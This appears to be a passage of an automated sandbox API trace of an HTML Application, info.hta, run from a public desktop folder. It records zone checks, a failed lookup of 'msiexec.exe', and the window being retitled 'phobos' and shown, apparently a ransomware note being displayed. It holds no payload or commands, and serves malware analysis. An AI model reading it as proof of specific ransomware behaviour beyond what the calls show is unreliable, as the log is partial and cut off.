[0226.951] IsCharSpaceW (wch=0x75) returned 0 [0226.951] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0226.951] IsCharSpaceW (wch=0x28) returned 0 [0226.951] IsCharSpaceW (wch=0x23) returned 0 [0226.951] IsCharSpaceW (wch=0x23) returned 0 [0226.951] IsCharSpaceW (wch=0x64) returned 0 [0226.951] IsCharSpaceW (wch=0x65) returned 0 [0226.951] IsCharSpaceW (wch=0x66) returned 0 [0226.951] IsCharSpaceW (wch=0x61) returned 0 [0226.951] IsCharSpaceW (wch=0x75) returned 0 [0226.951] IsCharSpaceW (wch=0x6c) returned 0 [0226.951] IsCharSpaceW (wch=0x74) returned 0 [0226.951] IsCharSpaceW (wch=0x23) returned 0 [0226.951] IsCharSpaceW (wch=0x41) returned 0 [0226.951] IsCharSpaceW (wch=0x50) returned 0 [0226.952] IsCharSpaceW (wch=0x50) returned 0 [0226.952] IsCharSpaceW (wch=0x4c) returned 0 [0226.952] IsCharSpaceW (wch=0x49) returned 0 [0226.952] IsCharSpaceW (wch=0x43) returned 0 [0226.952] IsCharSpaceW (wch=0x41) returned 0 [0226.952] IsCharSpaceW (wch=0x54) returned 0 [0226.952] IsCharSpaceW (wch=0x49) returned 0 [0226.952] IsCharSpaceW (wch=0x4f) returned 0 [0226.952] IsCharSpaceW (wch=0x4e) returned 0 [0226.952] IsCharSpaceW (wch=0x29) returned 0 [0226.952] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x36) returned 0x54f9a8 [0226.952] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x5533f8 [0226.952] IsCharSpaceW (wch=0x0) returned 0 [0226.952] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54f9a8 | out: hHeap=0x510000) returned 1 [0226.952] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5533f8 | out: hHeap=0x510000) returned 1 [0226.952] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.952] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x580080 [0226.952] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x5800a0 [0226.952] IsCharSpaceW (wch=0x75) returned 0 [0226.952] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0226.952] IsCharSpaceW (wch=0x28) returned 0 [0226.952] IsCharSpaceW (wch=0x23) returned 0 [0226.952] IsCharSpaceW (wch=0x23) returned 0 [0226.952] IsCharSpaceW (wch=0x64) returned 0 [0226.952] IsCharSpaceW (wch=0x65) returned 0 [0226.952] IsCharSpaceW (wch=0x66) returned 0 [0226.952] IsCharSpaceW (wch=0x61) returned 0 [0226.952] IsCharSpaceW (wch=0x75) returned 0 [0226.952] IsCharSpaceW (wch=0x6c) returned 0 [0226.952] IsCharSpaceW (wch=0x74) returned 0 [0226.952] IsCharSpaceW (wch=0x23) returned 0 [0226.952] IsCharSpaceW (wch=0x41) returned 0 [0226.952] IsCharSpaceW (wch=0x50) returned 0 [0226.952] IsCharSpaceW (wch=0x50) returned 0 [0226.952] IsCharSpaceW (wch=0x4c) returned 0 [0226.952] IsCharSpaceW (wch=0x49) returned 0 [0226.952] IsCharSpaceW (wch=0x43) returned 0 [0226.952] IsCharSpaceW (wch=0x41) returned 0 [0226.952] IsCharSpaceW (wch=0x54) returned 0 [0226.952] IsCharSpaceW (wch=0x49) returned 0 [0226.952] IsCharSpaceW (wch=0x4f) returned 0 [0226.953] IsCharSpaceW (wch=0x4e) returned 0 [0226.953] IsCharSpaceW (wch=0x29) returned 0 [0226.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x36) returned 0x54f9a8 [0226.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x553290 [0226.953] IsCharSpaceW (wch=0x0) returned 0 [0226.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x54) returned 0x550a20 [0226.953] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5241f8, Size=0x60) returned 0x55cc18 [0226.953] CoInternetIsFeatureEnabled (FeatureEntry=0x6, dwFlags=0x2) returned 0x0 [0226.959] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.959] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14d23c, dwFlags=0x0 | out: pdwZone=0x14d23c*=0xffffffff) returned 0x800c0011 [0226.959] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.959] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.959] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.959] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x2000, pPolicy=0x14d240, cbPolicy=0x4, pContext=0x54f9b4*=0x23, cbContext=0x2a, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14d240*=0x0) returned 0x0 [0226.959] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.959] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x50) returned 0x54e460 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x34) returned 0x54f9e8 [0226.959] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x580080 [0226.959] StrChrW (lpStart="default", wMatch=0x23) returned 0x0 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa8) returned 0x54a818 [0226.959] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x5800c0 [0226.959] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x5800e0 [0226.959] GetCurrentThreadId () returned 0xc4 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b820 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a) returned 0x56b3e0 [0226.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x94) returned 0x552e78 [0226.960] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa8) returned 0x5530b0 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2e) returned 0x52d818 [0226.960] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x580100 [0226.960] GetCurrentThreadId () returned 0xc4 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x32) returned 0x54fa28 [0226.960] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x580080 | out: hHeap=0x510000) returned 1 [0226.960] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0226.960] GetProcAddress (hModule=0x76340000, lpProcName=0x2) returned 0x76344642 [0226.960] StrCmpICW (pszStr1="APPLICATION", pszStr2="Application") returned 0 [0226.960] GetCurrentThreadId () returned 0xc4 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x552810 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x580080 [0226.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x48) returned 0x554270 [0226.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x5241f8 [0226.961] GetCurrentThreadId () returned 0xc4 [0226.961] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.961] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.961] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76340000 [0226.961] GetProcAddress (hModule=0x76340000, lpProcName="VariantClear") returned 0x76343eae [0226.961] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.961] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.961] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.961] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.962] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.963] GetCurrentThreadId () returned 0xc4 [0226.963] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.001] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x5528a0 [0227.001] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.001] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.001] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.001] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] GetCurrentThreadId () returned 0xc4 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] GetCurrentThreadId () returned 0xc4 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.002] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x580120 [0227.002] CreateUri (in: pwzURI="msiexec.exe", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14d238 | out: ppURI=0x14d238*=0x53c3d4) returned 0x0 [0227.003] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14d0c8 | out: ppu=0x14d0c8) returned 0x0 [0227.003] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14d184 | out: ppURI=0x14d184*=0x53c4ac) returned 0x0 [0227.003] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d14c | out: ppvObject=0x14d14c*=0x53c4ac) returned 0x0 [0227.003] IUnknown:Release (This=0x53c4ac) returned 0xb [0227.003] IUnknown:AddRef (This=0x53c4ac) returned 0xc [0227.008] CoInternetCombineIUri (in: pBaseUri=0x53c4ac, pRelativeUri=0x53c3d4, dwCombineFlags=0x6000000, ppCombinedUri=0x14d1b8, dwReserved=0x0 | out: ppCombinedUri=0x14d1b8*=0x53d3dc) returned 0x0 [0227.009] IUnknown:Release (This=0x53c4ac) returned 0xc [0227.009] IUnknown:Release (This=0x53c4ac) returned 0xb [0227.009] IUnknown:QueryInterface (in: This=0x53d3dc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d10c | out: ppvObject=0x14d10c*=0x53d3dc) returned 0x0 [0227.009] IUnknown:Release (This=0x53d3dc) returned 0x2 [0227.009] IUnknown:AddRef (This=0x53d3dc) returned 0x3 [0227.009] IUri:GetAbsoluteUri (in: This=0x53d3dc, pbstrAbsoluteUri=0x14d100 | out: pbstrAbsoluteUri=0x14d100*="file:///C:/users/public/desktop/msiexec.exe") returned 0x0 [0227.009] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xcc) returned 0x53d4a8 [0227.009] IUnknown:AddRef (This=0x53d3dc) returned 0x4 [0227.009] IUnknown:QueryInterface (in: This=0x53d3dc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d0dc | out: ppvObject=0x14d0dc*=0x53d3dc) returned 0x0 [0227.009] IUnknown:Release (This=0x53d3dc) returned 0x4 [0227.009] IUnknown:AddRef (This=0x53d3dc) returned 0x5 [0227.009] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x56b6b0 [0227.009] IUnknown:Release (This=0x53d3dc) returned 0x4 [0227.009] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x560190 [0227.009] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x551200 [0227.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14d088 | out: phkResult=0x14d088*=0x19c) returned 0x0 [0227.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14d08c | out: phkResult=0x14d08c*=0x1e4) returned 0x0 [0227.010] RegOpenKeyExW (in: hKey=0x1e4, lpSubKey="FEATURE_SUBDOWNLOAD_LOCKDOWN", ulOptions=0x0, samDesired=0x1, phkResult=0x14d048 | out: phkResult=0x14d048*=0x0) returned 0x2 [0227.010] RegOpenKeyExW (in: hKey=0x19c, lpSubKey="FEATURE_SUBDOWNLOAD_LOCKDOWN", ulOptions=0x0, samDesired=0x1, phkResult=0x14d048 | out: phkResult=0x14d048*=0x14c) returned 0x0 [0227.010] SHRegGetValueW () returned 0x2 [0227.010] SHRegGetValueW () returned 0x2 [0227.010] RegCloseKey (hKey=0x14c) returned 0x0 [0227.010] RegCloseKey (hKey=0x0) returned 0x6 [0227.010] RegCloseKey (hKey=0x0) returned 0x6 [0227.010] RegCloseKey (hKey=0x19c) returned 0x0 [0227.010] RegCloseKey (hKey=0x1e4) returned 0x0 [0227.010] IInternetSecurityManager:MapUrlToZone (in: This=0x542e68, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14d118, dwFlags=0x0 | out: pdwZone=0x14d118*=0x0) returned 0x0 [0227.011] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1b0) returned 0x57dac0 [0227.011] IUnknown:QueryInterface (in: This=0x53d3dc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ce14 | out: ppvObject=0x14ce14*=0x53d3dc) returned 0x0 [0227.011] IUnknown:Release (This=0x53d3dc) returned 0x4 [0227.011] IUnknown:AddRef (This=0x53d3dc) returned 0x5 [0227.011] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/msiexec.exe", ppu=0x14cdd8 | out: ppu=0x14cdd8) returned 0x0 [0227.011] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x58) returned 0x551320 [0227.011] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x58) returned 0x551380 [0227.011] CoInternetParseUrl (in: pwzUrl="file:///C:/users/public/desktop/msiexec.exe", ParseAction=0x9, dwFlags=0x0, pszResult=0x551320, cchResult=0x2c, pcchResult=0x14cde4, dwReserved=0x0 | out: pszResult="C:\\users\\public\\desktop\\msiexec.exe", pcchResult=0x14cde4) returned 0x0 [0227.011] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x551380 | out: hHeap=0x510000) returned 1 [0227.011] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x551320 | out: hHeap=0x510000) returned 1 [0227.011] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.011] IUnknown:AddRef (This=0x53d3dc) returned 0x6 [0227.011] IUnknown:AddRef (This=0x53d3dc) returned 0x7 [0227.011] IUnknown:QueryInterface (in: This=0x53d3dc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ce08 | out: ppvObject=0x14ce08*=0x53d3dc) returned 0x0 [0227.011] IUnknown:Release (This=0x53d3dc) returned 0x7 [0227.011] IUnknown:AddRef (This=0x53d3dc) returned 0x8 [0227.011] IUri:GetScheme (in: This=0x53d3dc, pdwScheme=0x57dbc8 | out: pdwScheme=0x57dbc8*=0x9) returned 0x0 [0227.011] CoInternetParseIUri (in: pIUri=0x53d3dc, ParseAction=0x9, dwFlags=0x0, pwzResult=0x14ce80, cchResult=0x104, pcchResult=0x14ce24, dwReserved=0x0 | out: pwzResult="C:\\users\\public\\desktop\\msiexec.exe", pcchResult=0x14ce24) returned 0x0 [0227.011] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4c) returned 0x54e300 [0227.011] FindFirstFileW (in: lpFileName="C:\\users\\public\\desktop\\msiexec.exe", lpFindFileData=0x14cbb0 | out: lpFindFileData=0x14cbb0) returned 0xffffffff [0227.011] IUnknown:QueryInterface (in: This=0x53d3dc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ce14 | out: ppvObject=0x14ce14*=0x53d3dc) returned 0x0 [0227.011] IUnknown:Release (This=0x53d3dc) returned 0x8 [0227.012] IUnknown:AddRef (This=0x53d3dc) returned 0x9 [0227.012] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x584808 [0227.012] IInternetSession:CreateBinding (in: This=0x545750, pbc=0x0, szUrl="file:///C:/users/public/desktop/msiexec.exe", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x584810, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x584810*=0x54ac00) returned 0x0 [0227.012] IUnknown:QueryInterface (in: This=0x54ac00, riid=0x74096078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x14cd98 | out: ppvObject=0x14cd98*=0x0) returned 0x80004002 [0227.012] IUnknown:QueryInterface (in: This=0x54ac00, riid=0x74096068*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14cda8 | out: ppvObject=0x14cda8*=0x54ac10) returned 0x0 [0227.012] IInternetPriority:SetPriority (This=0x54ac10, nPriority=-1) returned 0x0 [0227.012] IUnknown:Release (This=0x54ac10) returned 0x1 [0227.012] IUnknown:AddRef (This=0x54ac00) returned 0x2 [0227.012] IUnknown:QueryInterface (in: This=0x54ac00, riid=0x74096158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x14cddc | out: ppvObject=0x14cddc*=0x54ac00) returned 0x0 [0227.012] IInternetProtocolEx:StartEx (This=0x54ac00, pUri=0x53d3dc, pOIProtSink=0x57db14, pOIBindInfo=0x57dadc, grfPI=0x10, dwReserved=0x0) returned 0x800c0005 [0227.012] IUnknown:AddRef (This=0x57db14) returned 0x3 [0227.012] IUnknown:AddRef (This=0x57dadc) returned 0x4 [0227.012] IUnknown:QueryInterface (in: This=0x57dadc, riid=0x75326f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x14cd84 | out: ppvObject=0x14cd84*=0x0) returned 0x80004002 [0227.012] IInternetBindInfo:GetBindInfo (in: This=0x57dadc, grfBINDF=0x54ad70, pbindinfo=0x54ad78 | out: grfBINDF=0x54ad70*=0x20083, pbindinfo=0x54ad78) returned 0x0 [0227.012] IUnknown:AddRef (This=0x57db14) returned 0x5 [0227.012] IInternetProtocolSink:ReportProgress (This=0x57db14, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0 [0227.012] IInternetProtocolSink:ReportProgress (This=0x57db14, ulStatusCode=0xb, szStatusText="") returned 0x0 [0227.012] IInternetProtocolSink:ReportResult (This=0x57db14, hrResult=0x800c0005, dwError=0x2, szResult=0x0) returned 0x0 [0227.013] IInternetProtocolRoot:Terminate (This=0x54ac00, dwOptions=0x0) returned 0x0 [0227.013] IUnknown:Release (This=0x57dadc) returned 0x4 [0227.013] IUnknown:Release (This=0x57db14) returned 0x3 [0227.013] IUnknown:Release (This=0x57db14) returned 0x2 [0227.013] IUnknown:Release (This=0x54ac00) returned 0x2 [0227.013] IUnknown:Release (This=0x53d3dc) returned 0xa [0227.013] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.013] GetIUriPriv () returned 0x0 [0227.013] IUnknown:Release (This=0x53c65c) returned 0x3 [0227.013] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.013] IUnknown:Release (This=0x53d3dc) returned 0x9 [0227.013] IUnknown:Release (This=0x53d3dc) returned 0x8 [0227.013] CoTaskMemFree (pv=0x0) [0227.013] GetCurrentThreadId () returned 0xc4 [0227.013] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.013] GetIUriPriv () returned 0x0 [0227.013] IUnknown:Release (This=0x53c65c) returned 0x3 [0227.013] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.014] IUnknown:Release (This=0x53d3dc) returned 0x7 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.014] IUnknown:Release (This=0x54ac00) returned 0x1 [0227.014] IUnknown:Release (This=0x54ac00) returned 0x0 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x584808 | out: hHeap=0x510000) returned 1 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.014] IUnknown:Release (This=0x53d3dc) returned 0x4 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54e300 | out: hHeap=0x510000) returned 1 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57dac0 | out: hHeap=0x510000) returned 1 [0227.014] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x551200 | out: hHeap=0x510000) returned 1 [0227.014] IUnknown:Release (This=0x53d3dc) returned 0x3 [0227.014] IUnknown:Release (This=0x53c3d4) returned 0x2 [0227.014] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x56b700 [0227.014] GetWindowTextW (in: hWnd=0x20158, lpString=0x14c368, nMaxCount=512 | out: lpString="C:\\users\\public\\desktop\\info.hta") returned 32 [0227.014] NtdllDefWindowProc_W () returned 0x20 [0227.014] SetWindowTextW (hWnd=0x20158, lpString="phobos") returned 1 [0227.014] NtdllDefWindowProc_W () returned 0x1 [0227.015] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75450000 [0227.015] GetProcAddress (hModule=0x75450000, lpProcName="ExtractIconW") returned 0x7555dd1c [0227.015] ExtractIconW (hInst=0xb40000, lpszExeFileName="msiexec.exe", nIconIndex=0x0) returned 0x10193 [0227.194] SendMessageW (hWnd=0x6014e, Msg=0x80, wParam=0x1, lParam=0x10193) returned 0x0 [0227.194] NtdllDefWindowProc_W () returned 0x0 [0227.195] NtdllDefWindowProc_W () returned 0x0 [0227.195] NtdllDefWindowProc_W () returned 0x0 [0227.196] SendMessageW (hWnd=0x20158, Msg=0x80, wParam=0x0, lParam=0x10193) returned 0x0 [0227.196] NtdllDefWindowProc_W () returned 0x0 [0227.196] SetWindowLongW (hWnd=0x20158, nIndex=-16, dwNewLong=13041664) returned -2033254400 [0227.196] NtdllDefWindowProc_W () returned 0x0 [0227.196] NtdllDefWindowProc_W () returned 0x0 [0227.245] SetWindowLongW (hWnd=0x20158, nIndex=-20, dwNewLong=262144) returned 262400 [0227.245] NtdllDefWindowProc_W () returned 0x0 [0227.245] NtdllDefWindowProc_W () returned 0x0 [0227.246] SetWindowPos (hWnd=0x20158, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0227.246] NtdllDefWindowProc_W () returned 0x0 [0227.246] NtdllDefWindowProc_W () returned 0x0 [0227.246] NtdllDefWindowProc_W () returned 0x0 [0227.246] GlobalAddAtomW (lpString=0x0) returned 0x0 [0227.246] SetPropW (hWnd=0x6014e, lpString=0x0, hData=0x6014e) returned 0 [0227.247] ShowWindow (hWnd=0x20158, nCmdShow=1) returned 